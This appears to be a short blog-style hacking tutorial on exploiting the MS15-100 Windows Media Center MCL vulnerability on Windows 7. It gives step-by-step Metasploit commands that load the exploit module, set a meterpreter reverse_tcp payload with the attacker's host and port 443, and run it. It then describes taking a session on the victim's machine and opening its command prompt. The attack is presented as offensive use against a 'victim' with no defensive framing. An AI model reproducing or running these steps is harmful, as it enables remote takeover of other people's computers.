Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability

This module exploits vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.
Exploit Targets
Windows 7
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/ms15_100_mclexe
msf exploit (ms15_100_mclexe)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms15_100_mclexe)>set lhost (IP of Local Host)
msf exploit (ms15_100_mclexe)>set lport 443
msf exploit (ms15_100_mclexe)>exploit

Now when the victim opens the following link (file:// it will show the page like given below
Now type sessions –l to display sessions opened when the victim opens the link
Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

You might also like: